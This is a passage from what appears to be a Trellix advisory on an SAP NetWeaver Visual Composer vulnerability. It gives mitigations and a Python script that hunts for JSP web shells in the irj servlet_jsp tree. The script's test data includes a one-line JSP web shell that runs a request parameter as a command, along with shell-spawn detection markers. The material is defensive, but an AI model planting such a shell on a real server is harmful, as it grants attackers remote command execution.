  • Restrict public access to /developmentserver/metadatauploader
  • Hunt for unusual .jsp, .java, or .class files in:
    • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
    • .../work
    • .../sync
  • Check your system using: http://host:port/nwa/sysinfo → Look for VCFRAMEWORK.SCA
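The "hunt for unusual .jsp, .java, or .class files" step is easy to say and tedious to do by hand, so here is an added example of it (not SAP's tooling and not Trellix code): walk the servlet_jsp tree, report suspect files modified inside a window that are not on your known-good list, and upgrade the reason when the file both reads a request parameter and spawns a process, which is the shape of a cmd.jsp shell. The directory layout, file contents and known-good list in `demo()` are constructed for the example; point `hunt_jsp_shells()` at the real irj root listed above in production.

```python
import os
import tempfile
import time
from pathlib import Path

SUSPECT_SUFFIXES = {".jsp", ".java", ".class"}
SHELL_MARKERS = ("Runtime.getRuntime().exec", "ProcessBuilder")


def hunt_jsp_shells(root, known_good=(), newer_than_days=30, now=None):
    """Return sorted (relative path, reason) pairs for .jsp/.java/.class files under root
    that are not on the known-good list and were modified within the window.
    Source files that read a request parameter and spawn a process get the stronger
    'webshell-indicator' reason; everything else is 'recent-unknown'."""
    now = time.time() if now is None else now
    cutoff = now - newer_than_days * 86400
    known_good = set(known_good)
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        if rel in known_good or path.stat().st_mtime < cutoff:
            continue
        reason = "recent-unknown"
        if path.suffix.lower() != ".class":   # compiled classes need a different check
            text = path.read_text(errors="ignore")
            if "getParameter" in text and any(m in text for m in SHELL_MARKERS):
                reason = "webshell-indicator"
        hits.append((rel, reason))
    return sorted(hits)


def demo():
    """Build a throwaway tree shaped like the irj servlet_jsp root and hunt through it."""
    now = time.time()
    with tempfile.TemporaryDirectory() as td:
        root = Path(td) / "servlet_jsp" / "irj" / "root"
        root.mkdir(parents=True)
        (root / "cmd.jsp").write_text(
            '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
        )
        (root / "helper.jsp").write_text("<%= new java.util.Date() %>")   # recent, unknown
        (root / "known.jsp").write_text("<%= new java.util.Date() %>")    # recent, whitelisted
        old = root / "old.jsp"                                              # older than the window
        old.write_text("<%= 1 + 1 %>")
        os.utime(old, (now - 90 * 86400, now - 90 * 86400))
        (root / "notes.txt").write_text("not a servlet")                  # wrong suffix
        return hunt_jsp_shells(Path(td), known_good={"servlet_jsp/irj/root/known.jsp"}, now=now)
```

Treat the mtime window as a convenience, not a guarantee: a shell dropped with a backdated timestamp will only show up through the content markers or a diff against a known-good deployment inventory.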

Trellix Customers:  A Trellix Intrusion Prevention System (IPS) Emergency User Defined Signature (UDS) has been created to detect this threat. The UDS and its Release Notes are available for download from Trellix Intrusion Prevention System User-Defined Signature releases. Please refer to Thrive Support Portal Article Number 000014484 to download the UDS and apply it in your Trellix IPS environment

Discover the latest cybersecurity research from the Trellix Advanced Research Center: https://www.trellix.com/advanced-research-center/

This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.
